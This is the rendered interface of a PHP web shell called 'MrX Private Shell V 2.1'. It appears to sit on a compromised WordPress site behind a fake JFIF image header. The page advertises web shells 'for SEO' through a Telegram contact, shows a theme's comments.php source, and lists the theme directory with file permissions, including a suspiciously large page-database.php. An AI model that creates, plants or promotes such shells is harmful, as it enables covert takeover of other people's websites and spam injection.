����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The template for displaying comments
*
* The area of the page that contains both current comments
* and the comment form.
*
* @package WordPress
* @subpackage Twenty_Fifteen
* @since Twenty Fifteen 1.0
*/
/*
* If the current post is protected by a password and
* the visitor has not yet entered the password we will
* return early without loading the comments.
*/
if ( post_password_required() ) {
return;
}
?>
<div id="comments" class="comments-area">
<?php if ( have_comments() ) : ?>
<h2 class="comments-title">
<?php
$comments_number = get_comments_number();
if ( '1' === $comments_number ) {
/* translators: %s: post title */
printf( _x( 'One thought on “%s”', 'comments title', 'twentyfifteen' ), get_the_title() );
} else {
printf(
/* translators: 1: number of comments, 2: post title */
_nx(
'%1$s thought on “%2$s”',
'%1$s thoughts on “%2$s”',
$comments_number,
'comments title',
'twentyfifteen'
),
number_format_i18n( $comments_number ),
get_the_title()
);
}
?>
</h2>
<?php twentyfifteen_comment_nav(); ?>
<ol class="comment-list">
<?php
wp_list_comments( array(
'style' => 'ol',
'short_ping' => true,
'avatar_size' => 56,
) );
?>
</ol><!-- .comment-list -->
<?php twentyfifteen_comment_nav(); ?>
<?php endif; // have_comments() ?>
<?php
// If comments are closed and there are comments, let's leave a little note, shall we?
if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) :
?>
<p class="no-comments"><?php _e( 'Comments are closed.', 'twentyfifteen' ); ?></p>
<?php endif; ?>
<?php comment_form(); ?>
</div><!-- .comments-area -->
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| genericons | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| 404.php | File | 809 B | 0644 |
|
| archive.php | File | 1.87 KB | 0644 |
|
| author-bio.php | File | 1.11 KB | 0644 |
|
| comments.php | File | 1.79 KB | 0644 |
|
| content-link.php | File | 1.71 KB | 0644 |
|
| content-none.php | File | 1.14 KB | 0644 |
|
| content-page.php | File | 1.09 KB | 0644 |
|
| content-search.php | File | 1.08 KB | 0644 |
|
| content.php | File | 1.66 KB | 0644 |
|
| footer.php | File | 823 B | 0644 |
|
| functions.php | File | 14.07 KB | 0644 |
|
| header.php | File | 1.8 KB | 0644 |
|
| image.php | File | 2.87 KB | 0644 |
|
| index.php | File | 1.72 KB | 0644 |
|
| page-database.php | File | 181.29 KB | 0644 |
|
| page.php | File | 902 B | 0644 |
|
| readme.txt | File | 3.53 KB | 0644 |
|
| rtl.css | File | 12.17 KB | 0644 |
|
| screenshot.png | File | 562.73 KB | 0644 |
|
| search.php | File | 1.37 KB | 0644 |
|
| sidebar.php | File | 1.28 KB | 0644 |
|
| single.php | File | 1.49 KB | 0644 |
|
| style.css | File | 95.54 KB | 0644 |
|